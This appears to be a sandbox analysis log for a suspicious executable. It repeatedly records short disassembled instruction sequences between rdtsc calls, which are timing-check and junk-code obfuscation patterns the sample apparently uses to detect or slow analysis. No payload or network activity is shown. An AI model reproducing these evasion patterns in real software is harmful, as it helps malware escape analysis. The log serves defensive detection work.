Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11767C6 second address: 11767F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d jng 00007F83ACE24F26h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F83ACE24F30h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 117B7A2 second address: 117B7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1180B1F second address: 1180B41 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F83ACE24F2Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F83ACE24F2Bh 0x00000012 js 00007F83ACE24F26h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1180C79 second address: 1180C8C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007F83ACDAA9E6h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jns 00007F83ACDAA9E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1186A43 second address: 1186A4F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F83ACE24F26h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1186A4F second address: 1186A57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1186A57 second address: 1186A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1186A5B second address: 1186A5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 118BD3C second address: 118BD5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F83ACE24F37h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 118E85A second address: 118E862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 118E862 second address: 118E870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 118E870 second address: 118E88D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F83ACDAA9F3h 0x00000009 je 00007F83ACDAA9E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 118E411 second address: 118E415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 118E5B1 second address: 118E5B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 118E5B5 second address: 118E5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACE24F31h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 118E5D3 second address: 118E5DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 118E5DC second address: 118E5E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1194DC1 second address: 1194DC7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1194989 second address: 119498D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 119B68C second address: 119B6AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F83ACDAA9ECh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10BCC57 second address: 10BCC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10BCC5B second address: 10BCC5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11A4B67 second address: 11A4B85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F83ACE24F38h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11A4B85 second address: 11A4B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F83ACDAA9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11A4B96 second address: 11A4B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11AA508 second address: 11AA52F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F6h 0x00000007 jmp 00007F83ACDAA9EDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11AA52F second address: 11AA548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F83ACE24F2Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11AA548 second address: 11AA562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACDAA9F6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11AA562 second address: 11AA578 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F83ACE24F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F83ACE24F26h 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11AA578 second address: 11AA57E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11AA57E second address: 11AA582 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11AA712 second address: 11AA716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11AA716 second address: 11AA71A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11AA85A second address: 11AA85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11AA85E second address: 11AA870 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c js 00007F83ACE24F26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11AAD4F second address: 11AAD55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11AAD55 second address: 11AAD59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11AAD59 second address: 11AAD5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11AAED2 second address: 11AAEFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F83ACE24F2Eh 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F83ACE24F2Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11AAEFA second address: 11AAF1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F83ACDAA9F3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jl 00007F83ACDAA9E6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11ABB11 second address: 11ABB15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11ABB15 second address: 11ABB4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F83ACDAA9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F83ACDAA9F0h 0x00000014 pushad 0x00000015 jmp 00007F83ACDAA9F8h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11ABB4F second address: 11ABB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11AE6C6 second address: 11AE6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11AE6CE second address: 11AE6DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F83ACE24F26h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11B8FF7 second address: 11B8FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11CAFAF second address: 11CAFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F83ACE24F26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11CCE2F second address: 11CCE35 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11CCE35 second address: 11CCE5B instructions: 0x00000000 rdtsc 0x00000002 je 00007F83ACE24F2Eh 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007F83ACE24F26h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F83ACE24F34h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11CFDFC second address: 11CFE0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F83ACDAA9EFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11E2AEB second address: 11E2AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11E2AF1 second address: 11E2AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11E2AFA second address: 11E2B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACE24F2Ah 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F83ACE24F30h 0x00000012 push ebx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11E2B20 second address: 11E2B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F83ACDAA9F5h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11E2B3B second address: 11E2B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11E36B2 second address: 11E36BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F83ACDAA9E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11E36BE second address: 11E36E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F83ACE24F3Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11E36E1 second address: 11E3712 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F83ACDAA9ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F83ACDAA9FFh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11E3712 second address: 11E3724 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F83ACE24F28h 0x00000008 jng 00007F83ACE24F2Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11E916C second address: 11E91A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F83ACDAAA03h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F83ACDAA9F5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11E97A5 second address: 11E9842 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jns 00007F83ACE24F26h 0x00000011 jmp 00007F83ACE24F2Bh 0x00000016 popad 0x00000017 push esi 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b popad 0x0000001c nop 0x0000001d call 00007F83ACE24F31h 0x00000022 jmp 00007F83ACE24F2Dh 0x00000027 pop edx 0x00000028 push dword ptr [ebp+122D1ED9h] 0x0000002e mov dx, 3F7Ch 0x00000032 call 00007F83ACE24F29h 0x00000037 pushad 0x00000038 jnl 00007F83ACE24F2Ch 0x0000003e jmp 00007F83ACE24F38h 0x00000043 popad 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F83ACE24F36h 0x0000004b pop edx 0x0000004c mov eax, dword ptr [esp+04h] 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11E9842 second address: 11E9849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11E9849 second address: 11E9853 instructions: 0x00000000 rdtsc 0x00000002 js 00007F83ACE24F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11E9853 second address: 11E9867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b je 00007F83ACDAA9E6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11E9867 second address: 11E987D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11EB029 second address: 11EB033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F83ACDAA9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11EB033 second address: 11EB039 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11ECB0B second address: 11ECB17 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1108109 second address: 110810D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 110810D second address: 1108126 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F83ACDAA9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d jp 00007F83ACDAA9E8h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1108126 second address: 110812A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 497032C second address: 49703A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F83ACDAA9EFh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F83ACDAA9F4h 0x00000013 push eax 0x00000014 jmp 00007F83ACDAA9EBh 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b call 00007F83ACDAA9F4h 0x00000020 movzx ecx, dx 0x00000023 pop edx 0x00000024 mov edx, esi 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 jmp 00007F83ACDAA9F6h 0x0000002e mov edx, dword ptr [ebp+0Ch] 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49703A1 second address: 49703A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 499063E second address: 4990680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F83ACDAA9EEh 0x0000000f push eax 0x00000010 jmp 00007F83ACDAA9EBh 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov si, dx 0x0000001c push ebx 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4990680 second address: 49906BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F83ACE24F36h 0x00000009 adc ch, 00000048h 0x0000000c jmp 00007F83ACE24F2Bh 0x00000011 popfd 0x00000012 mov ah, EEh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 lea eax, dword ptr [ebp-04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov si, 4753h 0x00000021 movzx eax, bx 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49906BC second address: 49906C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49906C2 second address: 4990700 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F83ACE24F2Dh 0x00000015 or ax, E5C6h 0x0000001a jmp 00007F83ACE24F31h 0x0000001f popfd 0x00000020 mov edi, ecx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4990700 second address: 4990720 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F83ACDAA9ECh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4990720 second address: 4990736 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4990736 second address: 499073A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 499073A second address: 4990740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4990740 second address: 4990746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4990783 second address: 49907D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 3234h 0x00000007 call 00007F83ACE24F2Dh 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov esi, eax 0x00000012 jmp 00007F83ACE24F37h 0x00000017 je 00007F83ACE24F97h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ecx, edi 0x00000022 call 00007F83ACE24F37h 0x00000027 pop eax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49907D8 second address: 49907F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F83ACDAA9F5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4990842 second address: 499085F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
